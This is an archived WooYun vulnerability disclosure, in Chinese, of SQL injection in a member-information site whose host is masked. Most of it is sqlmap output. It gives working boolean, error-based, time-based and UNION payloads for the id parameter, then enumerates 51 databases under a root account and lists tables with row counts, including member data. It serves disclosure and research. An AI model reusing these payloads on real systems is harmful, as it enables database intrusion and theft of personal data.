乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-24: 细节已通知厂商并且等待厂商处理中 2015-09-25: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-10-05: 细节向核心白帽子及相关领域专家公开 2015-10-15: 细节向普通白帽子公开 2015-10-25: 细节向实习白帽子公开 2015-11-09: 细节向公众公开
百万企业会员及个人会员信息泄漏
注入点
http://**.**.**.**/mvinfo.html?id=57
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=57 AND 6732=6732 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: id=57 AND (SELECT 1588 FROM(SELECT COUNT(*),CONCAT(0x7178627671,(SELECT (ELT(1588=1588,1))),0x7176627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 OR time-based blind Payload: id=57 OR SLEEP(10) Type: UNION query Title: MySQL UNION query (NULL) - 9 columns Payload: id=-2886 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7178627671,0x6966746a6561656c704a,0x7176627a71),NULL,NULL,NULL,NULL,NULL#---web server operating system: Windows 2008 R2 or 7web application technology: Microsoft IIS 7.5, ASP.NETback-end DBMS: MySQL 5.0available databases [51]:[*] gifts[*] information_schema[*] isystem[*] meijiejie[*] mjj_db[*] mysql[*] performance_schema[*] photo_sjzl[*] poco[*] qgyinglou[*] school[*] shenzhoutianxing[*] shuijing[*] site[*] sjzlbbs[*] spider_db[*] task_db[*] temp[*] test[*] tools[*] tp_passer[*] ucenter[*] ultrax[*] vmall[*] web_app[*] web_cj[*] web_data[*] web_db[*] web_gh[*] web_jf[*] web_mall[*] web_partner[*] web_poster[*] web_quan[*] web_seo[*] web_shop[*] web_talk[*] web_tuan[*] web_vote[*] web_ws[*] web_wsh[*] web_wxm[*] web_xs[*] web_yiye[*] web_yykj[*] wed_db[*] wzhs[*] yangpian[*] yingbo[*] zero[*] zz_jixiesqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=57 AND 6732=6732 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: id=57 AND (SELECT 1588 FROM(SELECT COUNT(*),CONCAT(0x7178627671,(SELECT (ELT(1588=1588,1))),0x7176627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 OR time-based blind Payload: id=57 OR SLEEP(10) Type: UNION query Title: MySQL UNION query (NULL) - 9 columns Payload: id=-2886 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7178627671,0x6966746a6561656c704a,0x7176627a71),NULL,NULL,NULL,NULL,NULL#---web server operating system: Windows 2008 R2 or 7web application technology: Microsoft IIS 7.5, ASP.NETback-end DBMS: MySQL 5.0current user: 'root@%'Database: web_db+----------------------------+---------+| Table | Entries |+----------------------------+---------+| ei_wall | 1218978 || web_vote_wxlog | 509260 || web_vote_sms | 473751 || web_vote_data_bak | 407691 || web_vote_data | 371147 || web_plugin_eic_name | 339847 || web_plugin_score_uc | 320597 || web_mod_works | 287548 || web_vote_wxdata | 214693 || web_vote_msg | 172701 || web_vote_log | 172679 || web_wx_news_bak | 136926 || web_wx_news | 118477 || web_plugin_eic_users | 111589 || ei_user_info | 111003 || web_plugin_score_uc_info | 101912 || ei_web_config | 81793 || web_eic_photo_mode | 66027 || web_tags_rel | 59549 || web_uc | 56353 || web_plugin_eic_other | 54500 || web_mod_news | 53184 || web_mod_news_data | 53169 || web_eic_wx | 46210 || web_plugin_score_log | 32990 || a_mod_works | 31892 || web_mod_photo | 23979 || web_site_categorys | 22992 || web_index_mod | 20845 || web_tags | 19620 || ei_xitie | 15665 || web_admin_log | 13317 || web_mod_qas | 13248 || web_plugin_score_slog | 9975 || web_plugin_wheel_log | 9562 || web_vote_item_thumbs | 8471 || web_plugin_wheel_wxlog | 7386 || web_mod_combos | 6937 || web_site_menus | 6837 || web_sys_msg_status | 6663 || web_eic_comment | 6263 || web_tem_ip | 6201 || web_plugin_eic_photos | 5849 || web_spider_task | 5845 || web_mod_view | 5467 || web_mod_order | 5236 || web_plugin_score_gift | 5213 || web_index_ads | 4812 || web_eic_order | 4467 || web_spider_result | 4195 || a_mod_photo | 3987 || web_tem_wx | 3651 || web_mod_works_sjzl | 3240 || web_eic_remark | 3194 || web_plugin_score_record | 3128 || web_plugin_score_uc_memo | 3111 || web_look_log | 2868 || web_eicapp_dy | 2681 || web_eicapp_praise_info | 2621 || web_vote_item | 2607 || web_mod_team | 2306 || web_site_config | 2251 || web_index | 2187 || web_site_diy | 2185 || web_site_company | 2167 || web_plugin_user | 1774 || web_eicapp_img | 1530 || web_plugin_xp_photos | 1486 || a_mod_news | 1445 || a_mod_news_data | 1445 || web_eicapp_praise_limited | 1424 || web_index_ad_diy | 1402 || web_sys_msg | 1251 || web_tbuy_order | 1169 || web_eicapp_info | 922 || web_mod_video | 911 || web_tbuy_list | 897 || web_plugin_xp_photos_combo | 836 || web_index_css | 798 || web_index_html_mod | 790 || web_plugin_config | 777 || web_index_html | 764 || web_tuan_config | 727 || web_plugin_eic_diy | 632 || web_mod_promo | 558 || web_plugin_xp_combo_data | 476 || web_plugin_user_rules | 435 || web_plugin_wheel_gift | 434 || web_mod_pslc | 421 || web_tips_log | 413 || web_eic_order_manager | 391 || web_plugin_eic_buylog | 385 || web_plugin_score_request | 329 || web_func_js | 316 || web_photo_comment | 302 || web_plugin_xp_combo_item | 288 || web_eicapp_praise_rel | 272 || web_music_bak | 271 || web_func_link | 255 || web_mod_promo_record | 253 || web_music | 253 || web_index_qq_mod | 237 || web_plugin_score_infos | 234 || web_plugin_user_groups | 229 || web_wx_menu | 206 || web_mm_static | 199 || guanli_lemon_vote | 186 || web_vote_award | 169 || web_site_mobile | 158 || web_tem_bm | 152 || web_vote_main | 152 || web_eic_case | 150 || web_vote_config_new | 144 || web_vote_rules | 135 || web_other_menus | 129 || web_eicapp_uc | 127 || web_vote_config | 126 || web_plugin_eic_config | 124 || web_eicapp_praise_config | 119 || web_mm_account | 111 || web_plugin_wheel_main | 111 || web_wx_extra | 101 || web_plugin_wheel_config | 98 || web_index_ad_pos | 97 || eic_keywords | 90 || web_plugin_score_uu | 81 || web_plugin_xp_combo | 76 || web_plugin_wheel_pre | 72 || web_video_mod | 64 || web_mm_other | 62 || web_mould | 61 || web_mm_welcome | 56 || ei_mod_list | 55 || web_eic_agents_info | 55 || web_plugin_xp_user | 54 || web_allow_www | 50 || web_eicapp_ym | 49 || web_site_diy_ext | 46 || web_site_msg | 43 || web_eic_quan_log | 40 || web_plugin_score_cards | 39 || web_site_admin | 39 || web_site_msglog | 39 || web_site_welcome | 39 || web_eicapp_uc_info | 35 || web_mm_default | 35 || web_site_domain | 35 || web_eic_quan | 34 || web_site_priv | 34 || web_eic_agents | 31 || web_mod_news_view | 31 || web_plugin_user_group_desc | 31 || web_config_mods | 27 || web_eic_agent_account | 27 || web_eicus_config | 27 || web_plugin_wheel_sms | 24 || web_plugin_wheel_user | 20 || web_poster_info | 20 || web_eic_agent_sign | 19 || web_eicapp_mould | 17 || web_poster_data | 16 || web_badip | 14 || web_index_qq | 13 || web_qq_link | 13 || web_eicapp_praise_basic | 12 || web_plugin_eic_diy_infos | 12 || web_plugin_user_apply | 9 || web_video_order | 9 || web_eic_agent_details | 8 || web_plugin_contacts | 7 || web_site_msg_status | 7 || web_plugin_wcard_user | 6 || web_eicapp_buylog | 5 || web_menu_item | 5 || web_poster_type | 5 || web_video_cate | 5 || web_plugin_member_dept | 4 || web_plugin_subusers | 4 || web_plugin_tuan_cates | 4 || web_eicapp_user | 3 || web_eicus_copyright | 3 || web_plugin_member | 3 || web_plugin_wcard | 3 || web_tuan_vote | 3 || web_eic_js | 2 || web_eic_wxtoken | 2 || web_site_company_subcoms | 2 || web_wb_menu | 2 || web_wb_other | 2 || web_wb_static | 2 || web_plugin_member_sign | 1 || web_plugin_score | 1 || web_wb_account | 1 || web_wb_default | 1 || web_wb_welcome | 1 |+----------------------------+---------+Database: meijiejie+----------------------------+---------+| Table | Entries |+----------------------------+---------+| qy_member | 332026 || qy_hr_apply_tiny | 110879 || qy_debug_time | 90906 || qy_hr_apply_position | 87623 || qy_hr_hit | 63005 || qy_hr_apply_area | 55255 || qy_hr_apply | 45818 || qy_hr_apply_data | 45818 || qy_hr_job | 22096 || qy_news | 10252 || qy_news_content | 10185 || qy_area | 3235 || qy_company | 2996 || qy_ulog | 1748 || qy_online | 1676 || qy_member_reg | 1179 || qy_adminlog | 364 || qy_admin_role_list | 260 || qy_hr_type | 232 || qy_admin_wx_code | 196 || qy_poco_images | 124 || qy_digg | 104 || qy_info_mark | 73 || qy_model | 53 || qy_hr_roles | 51 || qy_ads | 49 || qy_news_comment | 42 || qy_hr_type_bak | 38 || qy_content_position | 37 || qy_member_log | 34 || qy_online_active | 31 || qy_news_category | 30 || qy_online_login | 24 || qy_hr_job_images | 18 || qy_record_top | 16 || qy_member_recommend | 15 || qy_member_account | 14 || qy_news_position | 14 || qy_ads_place | 13 || qy_record_getcoins | 12 || qy_poco_content | 11 || qy_vip_note | 9 || qy_get_pwd | 8 || qy_member_cert | 8 || qy_poco_cates | 8 || qy_avatar_status | 7 || qy_company_index | 7 || qy_hr_job_data | 7 || qy_hr_mark | 7 || qy_member_has_roles | 7 || qy_shop | 7 || qy_online_times | 6 || qy_member_point_log | 5 || qy_message | 5 || qy_message_data | 5 || qy_roles | 5 || qy_hr_stock | 4 || qy_link | 4 || qy_morder | 4 || qy_sms_log | 4 || qy_admin_roles | 3 || qy_message_status | 3 || qy_admin | 1 || qy_admin_group | 1 || qy_admin_has_admin_roles | 1 || qy_company_userid_seq | 1 || qy_content_position__seq | 1 || qy_hr_fav | 1 || qy_mobile_list | 1 || qy_news_apply | 1 || qy_news_category_catid_seq | 1 || qy_online_weeklist | 1 || qy_safe_event | 1 || qy_slide_pos | 1 || qy_www_question | 1 |+----------------------------+---------+Database: yingbo+-----------------------+---------+| Table | Entries |+-----------------------+---------+| yb_photos | 1308413 || yb_albums | 114707 || yb_member_info | 53016 || yb_member_profile | 53013 || yb_tags_position | 43059 || yb_feeds | 17941 || yb_articles | 14018 || yb_tracks | 10702 || yb_photos_bak | 5352 || yb_tags | 4106 || yb_message_data | 2996 || yb_message | 2970 || yb_member_mytags | 2469 || yb_dig_record | 2226 || yb_member_interest | 2195 || yb_photos_tmp | 1646 || yb_attention | 1196 || yb_posts | 836 || yb_member_tags | 620 || yb_comments | 327 || yb_collect_relation | 252 || yb_member_space | 202 || yb_albums_type | 119 || yb_friends_request | 103 || yb_classes | 90 || yb_member_cert | 87 || yb_friends | 64 || yb_member_apps | 63 || yb_org_photos | 57 || yb_org | 53 || yb_org_member_profile | 52 || yb_org_score | 52 || yb_photos_repos | 51 || yb_share | 47 || yb_last_active | 37 || yb_dianping_contents | 25 || yb_dianping_config | 24 || yb_org_member_request | 19 || yb_org_members | 19 || yb_dianping_invite | 18 || yb_member_jobtype | 18 || yb_member_recommend | 12 || yb_interest | 11 || yb_message_tpl | 11 || yb_feeds_tpl | 10 || yb_jobtype | 7 || yb_classes_data | 6 || yb_guestbook | 6 || yb_dianping_teacher | 4 || yb_suggest | 2 || yb_api_tokens | 1 || yb_config | 1 || yb_org_request | 1 |+-----------------------+---------+
如上
- -
危害等级:中
漏洞Rank:9
确认时间:2015-09-25 17:40
暂未建立与网站管理单位的直接处置渠道,待认领.
暂无
